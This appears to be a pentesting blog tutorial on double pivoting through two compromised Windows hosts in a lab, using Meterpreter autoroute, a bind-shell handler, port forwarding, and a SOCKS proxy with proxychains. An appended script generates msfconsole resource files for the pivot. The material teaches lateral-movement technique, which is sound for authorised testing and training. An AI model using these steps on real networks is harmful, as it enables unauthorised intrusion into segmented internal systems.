Double pivoting with Meterpreter
Hello folks,
Today we will talk about double pivoting using Meterpreter shell sessions.
I will focus only on pivoting and some related techniques, not on exploitation, because that is not our topic today.
First, this is our topology:
- Our Kali Linux machine, acting as the attacker, has IP 192.168.40.128.
- The first Windows 7 machine, our first pivot point, has two NICs: 192.168.40.142 and 192.168.30.133.
- The second Windows 7 machine, our second pivot point, has two NICs: 192.168.30.131 and 192.168.20.130.
- Finally, our target, Metasploitable, has a single IP, 192.168.20.128.
Kali can only reach the 192.168.40.0/24 network directly; 192.168.30.0/24 and 192.168.20.0/24 are reachable only through the pivots.
As I said before, how we gain access to the first machine is not our concern today. Assume you found a vulnerability on the first Windows 7 target and used it to get a Meterpreter shell. From that Meterpreter session, run the ipconfig command to list the machine's network cards and see how many networks it is connected to.
As we can see, and as described in the topology, it has two NICs: 192.168.40.142 and 192.168.30.133.
So we need a way to reach the 192.168.30.0/24 network, which we are not directly connected to.
To do that, add a route through this session with the command:
run autoroute -s 192.168.30.0/24
Then check the routing table with:
run autoroute -p
Now you can reach the 192.168.30.0/24 network, but only from inside Metasploit (its modules consult this routing table; tools outside the framework do not). I already know there is another target on that network, 192.168.30.131, which will be our second pivot point.
So I will generate a Meterpreter payload with msfvenom, using a bind shell so that Metasploit connects out to the second target through the route we just added, and configure a handler to receive the session from the second target.
Once the second session is up, check its NICs with ipconfig as well.
There is a third network connected to this machine, 192.168.20.0/24, so let's route it the same way (run autoroute -s 192.168.20.0/24 from the second session).
Now we can reach the remote network 192.168.20.0/24, and as I said, so far only from within Metasploit. Many post and auxiliary modules work over these routes; for example, I will use the post/multi/gather/ping_sweep module to discover hosts on the local network.
As we can see, we found several IPs, including 192.168.20.128, which is the Metasploitable machine. What about using another auxiliary module to check which ports are open on it, the way we would normally do with Nmap? A TCP port scanner such as auxiliary/scanner/portscan/tcp does this through the routes.
As we can see, many ports are open, so you can decide which port you want to start attacking. If you are a web pentester, I know you will look at port 80; if you are a network pentester, maybe you will look at ports 21 or 22 for a brute-force attack.
Whichever port you need, what if you want to reach it locally? For example, you might want to access port 80 on Metasploitable from your local web browser. This is easy with a port forward, so let's forward port 80.
From the last Meterpreter session (the one on the second pivot, which can reach 192.168.20.0/24), we use the command:
portfwd add -L <local address to listen on> -l <local port that will map to the remote port> -p <remote port you need to reach> -r <remote host IP>
For this topology that is: portfwd add -L 127.0.0.1 -l 8080 -p 80 -r 192.168.20.128 (8080 is just an arbitrary free local port). You can then open http://127.0.0.1:8080 in your browser and the traffic is carried through both pivots. Note that this forward is tied to the session it was created from; if that session dies, the forward dies with it.
That covers the Metasploit auxiliary and post modules and port forwarding. What if you need to use tools outside Metasploit, such as Nmap? For that we use the SOCKS server module together with proxychains.
First, start the auxiliary/server/socks4a module (in newer Metasploit versions this is auxiliary/server/socks_proxy with VERSION set to 4a). The SOCKS server uses the framework's routing table, so anything reachable through the autoroute entries above is reachable through the proxy.
In my case I started it twice, on two different ports, so when you run the jobs command you will see two SOCKS jobs.
Now you need to configure the proxychains config file (/etc/proxychains.conf, or /etc/proxychains4.conf for proxychains-ng).
I forgot to take a screenshot of the config file, but it is very easy.
You just put two lines at the end of the file, under [ProxyList]:
socks4 127.0.0.1 1080
socks4 127.0.0.1 1090
Don't forget to save it. One caveat: with the default strict_chain mode, proxychains chains through every listed proxy in order, so the connection to the second SOCKS server is itself made through the first. Since both servers sit in the same Metasploit instance and share its routing table, a single SOCKS server (and a single line here) is enough to reach both hidden networks.
Now your proxychains setup is ready, so let's try it.
It works fine with Nmap. Keep in mind that only TCP connections go through a SOCKS proxy, so use a TCP connect scan without host discovery (for example proxychains4 nmap -sT -Pn -n -p 21,22,80 192.168.20.128); SYN scans, ICMP pings and OS detection will not work through the proxy.
In my case, I use proxychains4 (proxychains-ng), which works better than the original proxychains.
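As an added example, not code from the original post, here is a small POSIX shell script that generates the msfconsole resource scripts and the proxychains config for the double pivot above, so the whole procedure (handler for the second pivot, routes through both sessions, SOCKS server, proxychains entries) is written down in one place instead of being typed by hand. It assumes session 1 is the first Windows 7 pivot and session 2 the second, that the bind_tcp payload listens on port 4444, and that the output filenames pivot-stage1.rc, pivot-stage2.rc and proxychains.conf are arbitrary; none of those values are from the post.

```shell
#!/bin/sh
# Added example (not from the original post). Builds the msfconsole resource
# scripts and proxychains config for the double pivot. Assumptions: session 1 is
# the first win7 pivot, session 2 the second, the bind payload port 4444 and the
# output filenames are arbitrary choices made here.

# Derive the CIDR that "route add" / "run autoroute -s" expects from an
# interface's IP and dotted netmask as shown by meterpreter's ipconfig,
# e.g. 192.168.30.133 255.255.255.0 -> 192.168.30.0/24
cidr_from_ip_mask() {
    set -- $(echo "$1" | tr . ' ') $(echo "$2" | tr . ' ')
    net="$(($1 & $5)).$(($2 & $6)).$(($3 & $7)).$(($4 & $8))"
    prefix=0
    for octet in $5 $6 $7 $8; do          # prefix length = number of 1-bits in the mask
        while [ "$octet" -gt 0 ]; do
            prefix=$((prefix + (octet & 1)))
            octet=$((octet >> 1))
        done
    done
    echo "$net/$prefix"
}

# "route add <cidr> <session>" at the msf prompt is equivalent to
# "run autoroute -s <cidr>" inside that meterpreter session.
route_cmd() {   # args: session-id interface-ip netmask
    echo "route add $(cidr_from_ip_mask "$2" "$3") $1"
}

# Handler for a bind_tcp meterpreter on the second pivot: Metasploit connects
# out to RHOST, and that connection rides the route added through session 1.
bind_handler_cmds() {   # args: second-pivot-ip lport
    cat <<EOF
use exploit/multi/handler
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST $1
set LPORT $2
run -j
EOF
}

# One SOCKS server is enough for both hidden networks: it consults the
# framework routing table, so anything routed via session 1 or 2 is reachable.
socks_cmds() {   # args: srvport
    cat <<EOF
use auxiliary/server/socks4a
set SRVHOST 127.0.0.1
set SRVPORT $1
run -j
EOF
}

# proxychains config. strict_chain tunnels through every listed proxy in
# order, so list one entry per SOCKS server you actually want to traverse.
proxychains_conf() {   # args: socks port(s)
    printf 'strict_chain\nproxy_dns\ntcp_read_time_out 15000\ntcp_connect_time_out 8000\n[ProxyList]\n'
    for port in "$@"; do
        echo "socks4 127.0.0.1 $port"
    done
}

# Stage 1 runs once session 1 (first pivot) exists; stage 2 runs once the
# bind handler has produced session 2, because "route add ... 2" needs it.
build_pivot_files() {
    {
        route_cmd 1 192.168.30.133 255.255.255.0        # first pivot's inner NIC
        bind_handler_cmds 192.168.30.131 4444           # assumed port
    } > pivot-stage1.rc
    {
        route_cmd 2 192.168.20.130 255.255.255.0        # second pivot's inner NIC
        socks_cmds 1080
    } > pivot-stage2.rc
    proxychains_conf 1080 > proxychains.conf
    echo "wrote pivot-stage1.rc, pivot-stage2.rc and proxychains.conf"
}

if [ "${1:-}" = "build" ]; then
    build_pivot_files
fi
```

Usage: sh pivot.sh build, then in msfconsole run resource pivot-stage1.rc after the first Meterpreter session is open, wait for the bind handler to return session 2, and run resource pivot-stage2.rc. Afterwards point proxychains at the generated config (proxychains4 -f proxychains.conf nmap -sT -Pn -n -p 21,22,80 192.168.20.128). The cidr_from_ip_mask helper is there because autoroute wants a subnet, while ipconfig in Meterpreter shows you an address and a netmask.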
In conclusion
I would like to thank Ebrahim Kadhi and Eslam Medhat.
That's all; I hope you liked my topic.